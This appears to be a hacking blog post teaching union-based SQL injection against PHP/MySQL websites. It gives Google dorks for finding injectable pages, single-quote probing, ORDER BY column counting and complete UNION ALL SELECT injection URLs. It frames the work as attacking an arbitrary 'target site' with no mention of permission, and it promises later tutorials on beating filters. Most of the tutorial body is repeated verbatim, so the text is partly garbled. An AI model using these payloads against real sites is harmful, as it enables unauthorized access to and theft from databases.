Sql Injection is a vast topic , I'll try to cover as much aspects I can . I have earned it with my own experience, toil and tear. So criticize me if you must but dont discourage my readers.
Now , sql injection can be done in address bar items(GET), or in text which the site writes/reads (COOKIE) , or in user agent and obviously in the POST .
This will cover mysql database and considering the script to be php , which is very usual. We are injectiing in the get parameter. More tut will be coming up , so dont bother.
In union injection. a new query is appended to an existing query. So its like a tall person is entering a building with key card and we make a short person walk closely behind the taller one so that the short one can also get pass the door .
One more thing I am taking a general example here coz Ill be throwing vulnerable website elsewhere on the site .
---------------------------------------------------------------------------------------------------------
We have a target site we want to Inject , cool . So find the link with get parameters . Surf the target site manually or use something like this in google.
---------------------------------
| site:target.com inurl:php 2 |
| site:target.com inurl:php?id |
---------------------------------
that should take you to a link with parameters.
One important thing , IT IS NOT AT ALL IMPORTANT THAT ONLY URL HAVING "=" ARE INJECTIBLE.
So , Lets say we get a target link ,
eg .
------------------------------------
site.com/news.php?id=234
or
site.com/news/234/sachin_tendulkar
---------------------------------------
Now the argument 234 in both the cases above maybe injectible.
So check if the argument you write is filtered or it goes through as it is. (now listen carefully dont loose heart if the site is filtering argument , Ill write on testing and beating filters also . )
to see the site is filtering or not give a stupid argument .
and yeah say hi to Mr. ' . (yeah im takling about the single quote )
Here on ill refer to mr ' as tick . ok cool nick name .
Its not a law that you to use tick(') , use anything as stupid as you want .
------------------------------------
site.com/news.php?id=234'
or
site.com/news/234'/sachin_tendulkar
---------------------------------------
when you do the stupid thing , you will get stupid responses(if its not filtering) like:
1. Sql error message .
2. Any html tag maybe missing giving you a page without a paragraph or image .
3. You will be redirected somewhere else.
4. A 500 error by IDS
5. OR even A firewall warning
Congrats the site is technically injectible .
The error megs tells you which database the site is using , it comes helpful .
=========================================================
Identify the argument is string type or integer type. I hope you know the difference? Never mind ,
if the argument supplied is text or number( abc...z 0-9) then its a string.
If the argument is numbers(0-9) then its integer.
BEWARE: I have seen some sites using numbers as string , so check for both .
if the arg(argument) is string then i need to put the tick for going further .
=========================================================
To use union you have to get the number of columns right. ie the columns of the table to which the query refers to .
so , to get the number of columns , you can go by two ways
1. use order by.
if the db is mysql order by is fine , but if you did not get the db name from error mesgs then use group by also .
2. Straight away use union all select . this way its painful but works universally .
eg.
------------------------------------
site.com/news.php?id=234 order by 1
or
site.com/topic.php?id=news' order by 1 and 'a'='a
or
site.com/topic.php?id=news' order by 1 -- -
---------------------------------------
You need to experiment and see if u really need to terminate the query at last using -- or /*
Keep in mind /* will not work for mysql 5 or higher.
with order by 1 the page should load fine .
if not then :
1. use group by or union select .
2. try different link of the same site .
3. it could be due to injection point being after order by . So ill put up tut for that later .
Now increase the count with order by .
site.com/topic.php?id=234 order by 2 -- - NO Dont go for it ! Yeah trust me . Instead do :
site.com/topic.php?id=123 order by 8457 -- -
Which should give you stupid response. See there is no point in doing order by 2, order by 3 ..... when you realise after reaching 30 that order by is not working . I have seen site of big mnc's having 91 columns so better be safe than sorry.
now try to get the columns number in the zone . REduce the range gradually .
site.com/topic.php?id=123 order by 50 -- -
site.com/topic.php?id=news' order by 50 and 'a'='a
And so on till you get the maximum number which does not give stupid response .
-------------------------------------------------
site.com/topic.php?id=123 order by 48 -- - // does not give stupid response
site.com/topic.php?id=news' order by 48 and 'a'='a // no stupid response
site.com/topic.php?id=123 order by 49 -- - // gives error or sumthin
site.com/topic.php?id=news' order by 49 and 'a'='a // gives error or somethin
------------------------------------------------------
So now i got the column number , 48.
================================================================================
The real game begins here.
we are goin to append the union query .
eg
----------------------------------
site.com/topic.php?id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 -- -
site.com/topic.php?id=news' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 and 'a'='a
------------------------------------------
Now , I dont know about you but I am not that crazy to write 1 to 48 manually . So use the hackbar on firefox or use the script which I personally use to generate numbers
-------------------------------------------------
j var dark=1; while(dark<49){document.write(dark+",");dark++}
------------------------------------------------------------
(Works for me in firefox and chrome like wonder)
When you do this , and run the union query, you should get numbers on the page . The number(s) you get on screen is actually the columns which are visible.
If you dont get the numbers on page , chill , put prefix a - with the argument .
eg .
----------------------------------
site.com/topic.php?id=-123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 -- -
site.com/topic.php?id=-news' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 and 'a'='a
------------------------------------------
That should bring up the number.
Donate me for support if you liked
Now , sql injection can be done in address bar items(GET), or in text which the site writes/reads (COOKIE) , or in user agent and obviously in the POST .
This will cover mysql database and considering the script to be php , which is very usual. We are injectiing in the get parameter. More tut will be coming up , so dont bother.
In union injection. a new query is appended to an existing query. So its like a tall person is entering a building with key card and we make a short person walk closely behind the taller one so that the short one can also get pass the door .
One more thing I am taking a general example here coz Ill be throwing vulnerable website elsewhere on the site .
---------------------------------------------------------------------------------------------------------
We have a target site we want to Inject , cool . So find the link with get parameters . Surf the target site manually or use something like this in google.
---------------------------------
| site:target.com inurl:php 2 |
| site:target.com inurl:php?id |
---------------------------------
that should take you to a link with parameters.
One important thing , IT IS NOT AT ALL IMPORTANT THAT ONLY URL HAVING "=" ARE INJECTIBLE.
So , Lets say we get a target link ,
eg .
------------------------------------
site.com/news.php?id=234
or
site.com/news/234/sachin_tendulkar
---------------------------------------
Now the argument 234 in both the cases above maybe injectible.
So check if the argument you write is filtered or it goes through as it is. (now listen carefully dont loose heart if the site is filtering argument , Ill write on testing and beating filters also . )
to see the site is filtering or not give a stupid argument .
and yeah say hi to Mr. ' . (yeah im takling about the single quote )
Here on ill refer to mr ' as tick . ok cool nick name .
Its not a law that you to use tick(') , use anything as stupid as you want .
------------------------------------
site.com/news.php?id=234'
or
site.com/news/234'/sachin_tendulkar
---------------------------------------
when you do the stupid thing , you will get stupid responses(if its not filtering) like:
1. Sql error message .
2. Any html tag maybe missing giving you a page without a paragraph or image .
3. You will be redirected somewhere else.
4. A 500 error by IDS
5. OR even A firewall warning
Congrats the site is technically injectible .
The error megs tells you which database the site is using , it comes helpful .
=========================================================
Identify the argument is string type or integer type. I hope you know the difference? Never mind ,
if the argument supplied is text or number( abc...z 0-9) then its a string.
If the argument is numbers(0-9) then its integer.
BEWARE: I have seen some sites using numbers as string , so check for both .
if the arg(argument) is string then i need to put the tick for going further .
=========================================================
To use union you have to get the number of columns right. ie the columns of the table to which the query refers to .
so , to get the number of columns , you can go by two ways
1. use order by.
if the db is mysql order by is fine , but if you did not get the db name from error mesgs then use group by also .
2. Straight away use union all select . this way its painful but works universally .
eg.
------------------------------------
site.com/news.php?id=234 order by 1
or
site.com/topic.php?id=news' order by 1 and 'a'='a
or
site.com/topic.php?id=news' order by 1 -- -
---------------------------------------
You need to experiment and see if u really need to terminate the query at last using -- or /*
Keep in mind /* will not work for mysql 5 or higher.
with order by 1 the page should load fine .
if not then :
1. use group by or union select .
2. try different link of the same site .
3. it could be due to injection point being after order by . So ill put up tut for that later .
Now increase the count with order by .
site.com/topic.php?id=234 order by 2 -- - NO Dont go for it ! Yeah trust me . Instead do :
site.com/topic.php?id=123 order by 8457 -- -
Which should give you stupid response. See there is no point in doing order by 2, order by 3 ..... when you realise after reaching 30 that order by is not working . I have seen site of big mnc's having 91 columns so better be safe than sorry.
now try to get the columns number in the zone . REduce the range gradually .
site.com/topic.php?id=123 order by 50 -- -
site.com/topic.php?id=news' order by 50 and 'a'='a
And so on till you get the maximum number which does not give stupid response .
-------------------------------------------------
site.com/topic.php?id=123 order by 48 -- - // does not give stupid response
site.com/topic.php?id=news' order by 48 and 'a'='a // no stupid response
site.com/topic.php?id=123 order by 49 -- - // gives error or sumthin
site.com/topic.php?id=news' order by 49 and 'a'='a // gives error or somethin
------------------------------------------------------
So now i got the column number , 48.
================================================================================
The real game begins here.
we are goin to append the union query .
eg
----------------------------------
site.com/topic.php?id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 -- -
site.com/topic.php?id=news' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 and 'a'='a
------------------------------------------
Now , I dont know about you but I am not that crazy to write 1 to 48 manually . So use the hackbar on firefox or use the script which I personally use to generate numbers
-------------------------------------------------
j var dark=1; while(dark<49){document.write(dark+",");dark++}
------------------------------------------------------------
(Works for me in firefox and chrome like wonder)
When you do this , and run the union query, you should get numbers on the page . The number(s) you get on screen is actually the columns which are visible.
If you dont get the numbers on page , chill , put prefix a - with the argument .
eg .
----------------------------------
site.com/topic.php?id=-123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 -- -
site.com/topic.php?id=-news' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 and 'a'='a
------------------------------------------
That should bring up the number.
Donate me for support if you liked
1 comments:
Please provide proper credits.
Post a Comment